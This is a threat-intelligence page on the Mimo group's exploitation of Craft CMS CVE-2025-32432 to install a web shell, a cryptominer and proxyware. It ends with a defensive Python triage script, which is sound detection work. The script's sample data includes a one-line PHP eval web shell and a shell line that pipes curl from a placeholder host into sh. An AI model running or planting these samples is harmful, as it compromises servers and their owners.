Craft CMS (Content Management System users)

The Mimo threat group exploited a maximum-severity vulnerability (CVE-2025-32432) in Craft CMS to deploy MimoLoader, a malicious payload that distributes cryptocurrency mining malware (XMRig) and residential proxyware (IPRoyal). Initial access came from a Turkish IP address: the attackers exploited the vulnerability to install a web shell, then used the web shell to run a persistence shell script. That script terminates any XMRig processes already running on the host before deploying MimoLoader, which in turn drops both the cryptocurrency miner and the proxyware. The short interval between disclosure of CVE-2025-32432 and its active exploitation shows Mimo's operational agility. The primary impact is unauthorized resource consumption (CPU and memory spent on mining) and abuse of the victim's network connection as a residential proxy, but an attacker holding a web shell on the CMS host can also move laterally if the compromise goes unchecked. Organizations running Craft CMS face operational disruption, reputational damage, and financial losses from cryptojacking. The reporting does not mention data exfiltration or ransomware, but the persistence mechanisms indicate a risk of long-term compromise.

Source: https://www.scworld.com/brief/craft-cms-exploit-facilitates-multiple-payload-delivery

TPRM report: https://www.rankiteo.com/company/craftcms

"id": "cra4550545113025",
"linkid": "craftcms",
"type": "Cyber Attack",
"date": "5/2025",
"severity": "60",
"impact": "2",
"explanation": "Attack limited on finance or reputation"
{'affected_entities': [{'type': ['organizations using Craft CMS']}],
 'attack_vector': ['exploitation of CVE-2025-32432 (Craft CMS vulnerability)',
                   'web shell deployment',
                   'persistence script execution',
                   'malware injection (MimoLoader, XMRig, IPRoyal)'],
 'description': 'Intrusions abusing the maximum severity Craft CMS '
                'vulnerability (CVE-2025-32432) have been launched by the Mimo '
                'threat operation to distribute the MimoLoader alongside '
                'cryptocurrency mining malware (XMRig) and residential '
                'proxyware (IPRoyal). Initial access was facilitated by '
                'exploiting the vulnerability from a Turkish IP address, '
                'allowing Mimo to deploy a web shell that executes a '
                'persistence shell script. This script terminates active XMRig '
                'processes before deploying MimoLoader, which then injects '
                'XMRig and IPRoyal proxyware. The threat actor remains active, '
                'demonstrating high responsiveness in exploiting newly '
                'disclosed vulnerabilities.',
 'impact': {'brand_reputation_impact': ['potential reputational damage due to '
                                        'compromise and malware deployment'],
            'operational_impact': ['potential system performance degradation '
                                   'due to cryptocurrency mining',
                                   'unauthorized proxyware (IPRoyal) usage']},
 'initial_access_broker': {'backdoors_established': ['web shell deployment'],
                           'entry_point': ['exploitation of CVE-2025-32432 '
                                           '(Craft CMS vulnerability)']},
 'investigation_status': 'ongoing',
 'lessons_learned': ['Threat actors like Mimo demonstrate rapid adoption of '
                     'newly disclosed vulnerabilities, emphasizing the need '
                     'for immediate patching. Exploitation of CMS '
                     'vulnerabilities can lead to multi-stage attacks, '
                     'including cryptojacking and proxyware deployment. '
                     'Persistence mechanisms (e.g., web shells and scripts) '
                     'are commonly used to maintain access and evade '
                     'detection.'],
 'motivation': ['financial gain (cryptocurrency mining)',
                'proxyware deployment for residential IP exploitation',
                'opportunistic exploitation of newly disclosed '
                'vulnerabilities'],
 'post_incident_analysis': {'root_causes': ['unpatched Craft CMS vulnerability '
                                            '(CVE-2025-32432)',
                                            'lack of detection for initial '
                                            'exploitation and '
                                            'post-exploitation activities '
                                            '(e.g., web shell, persistence '
                                            'scripts)']},
 'recommendations': ['Immediately patch Craft CMS installations to mitigate '
                     'CVE-2025-32432.',
                     'Monitor systems for unauthorized cryptocurrency mining '
                     'activity (e.g., XMRig processes).',
                     'Inspect networks for signs of proxyware (e.g., IPRoyal) '
                     'and unauthorized traffic routing.',
                     'Deploy behavioral detection mechanisms to identify web '
                     'shell and persistence script activities.',
                     'Conduct regular vulnerability assessments to identify '
                     'and remediate exposed services.'],
 'references': [{'source': 'The Hacker News'}, {'source': 'Sekoia.io'}],
 'response': {'third_party_assistance': ['Sekoia.io (analysis)']},
 'threat_actor': 'Mimo',
 'title': 'Exploitation of CVE-2025-32432 in Craft CMS by Mimo Threat '
          'Operation to Distribute MimoLoader, Cryptocurrency Mining Malware, '
          'and Proxyware',
 'type': ['cyberattack',
          'exploitation of vulnerability',
          'malware distribution',
          'cryptojacking',
          'proxyware deployment'],
 'vulnerability_exploited': 'CVE-2025-32432 (Craft CMS)'}
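The chain described above (exploitation of the CMS, web shell, a persistence script that kills XMRig and deploys a loader, then miner and proxyware processes) maps directly onto the record's recommendations to monitor for XMRig, proxyware and web shell activity. The Python below is an added triage example written for this page; it is not code from Sekoia.io, Rankiteo, Craft or the Mimo reporting. It assumes CVE-2025-32432 is reached through Craft's assets/generate-transform control panel action (the page itself names only the CVE), that IPRoyal's proxyware is recognisable by the IPRoyal or Pawns name, and that the loader is fetched with a curl-or-wget-piped-to-shell one-liner; all sample data is constructed (RFC 5737 addresses, made-up file and path names), not captured from a victim.

```python
"""Triage helpers for the Mimo / Craft CMS chain described on this page.

Each check runs over text the caller supplies, so it works offline and can
be pointed at real data later (the web server access log, `ps auxww` output,
cron entries and shell scripts, PHP files under the web root). The sample
inputs at the bottom are constructed for illustration only.
"""
import re
from typing import Iterable

# 1. Exploitation attempts. Assumption: CVE-2025-32432 is reached through the
#    control panel's assets/generate-transform action; the page names only the
#    CVE. Legitimate control panel users also call this action, so a hit is a
#    lead (check source IP, user agent, and whether a session cookie was
#    present), not proof of compromise.
GENERATE_TRANSFORM_RE = re.compile(r"actions/assets/generate-transform", re.I)

def find_exploit_candidates(access_log: Iterable[str]) -> list[str]:
    """Return POST requests to the generate-transform action."""
    return [line for line in access_log
            if GENERATE_TRANSFORM_RE.search(line) and '"POST ' in line]

# 2. Web shell heuristic: a PHP file that both reads request input and hands
#    it to a code/command execution primitive. Some frameworks do this
#    legitimately, so review every hit by hand.
EXEC_RE = re.compile(r"\b(eval|system|shell_exec|passthru|exec|assert)\s*\(", re.I)
INPUT_RE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")

def find_webshell_candidates(php_files: dict[str, str]) -> list[str]:
    """php_files maps path -> file contents; returns suspicious paths, sorted."""
    return sorted(path for path, src in php_files.items()
                  if EXEC_RE.search(src) and INPUT_RE.search(src))

# 3. Miner and proxyware processes. XMRig is matched on its binary name and
#    its pool/donation arguments; IPRoyal proxyware on the vendor/product name
#    (assumption: the page names the product, not the binary).
MINER_RE = re.compile(r"xmrig|stratum\+(tcp|ssl)://|--donate-level", re.I)
PROXYWARE_RE = re.compile(r"iproyal|pawns", re.I)

def classify_processes(ps_lines: Iterable[str]) -> dict[str, list[str]]:
    found: dict[str, list[str]] = {"miner": [], "proxyware": []}
    for line in ps_lines:
        if MINER_RE.search(line):
            found["miner"].append(line.strip())
        if PROXYWARE_RE.search(line):
            found["proxyware"].append(line.strip())
    return found

# 4. Persistence script pattern reported for this campaign: kill any XMRig
#    already on the box, then deploy the loader (assumed here to be fetched
#    with curl/wget piped into a shell).
KILL_XMRIG_RE = re.compile(r"\b(pkill|killall)\b[^\n]*xmrig", re.I)
FETCH_EXEC_RE = re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba)?sh\b", re.I)

def script_indicators(text: str) -> dict[str, bool]:
    return {"kills_xmrig": bool(KILL_XMRIG_RE.search(text)),
            "fetches_and_executes": bool(FETCH_EXEC_RE.search(text))}

def triage(access_log, ps_lines, php_files, script_text) -> dict:
    """Run all four checks and collect the hits in one report."""
    return {
        "exploit_requests": find_exploit_candidates(access_log),
        "webshell_files": find_webshell_candidates(php_files),
        "processes": classify_processes(ps_lines),
        "script": script_indicators(script_text),
    }

# Constructed samples: documentation IP ranges, invented names and paths.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [03/May/2025:10:14:02 +0000] "POST /index.php?p=admin/actions/assets/generate-transform HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '198.51.100.4 - - [03/May/2025:10:14:30 +0000] "GET /blog/hello HTTP/1.1" 200 8130 "-" "Mozilla/5.0"',
]
SAMPLE_PS = [
    "www-data  4412  0.0  0.1 php-fpm: pool www",
    "www-data  5120 98.7  2.3 /tmp/.x/xmrig -o stratum+tcp://203.0.113.9:3333 --donate-level 0",
    "www-data  5133  0.2  0.1 /tmp/.x/pawns-cli --accept-tos",
    "root         1  0.0  0.1 /sbin/init",
]
SAMPLE_PHP = {
    "web/index.php": "<?php require dirname(__DIR__) . '/vendor/autoload.php';",
    "web/cpresources/cache.php": "<?php @eval($_POST['c']);",
}
SAMPLE_SCRIPT = "#!/bin/sh\npkill -f xmrig\ncurl -s http://203.0.113.9/ml.sh | sh\n"

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_ACCESS_LOG, SAMPLE_PS, SAMPLE_PHP, SAMPLE_SCRIPT), indent=2))
```

On a live host the same functions take the access log read line by line, the output of `ps auxww`, the contents of every `.php` file under the web root, and each crontab entry or dropped script; the regexes are deliberately broad and every hit needs analyst confirmation before any response action.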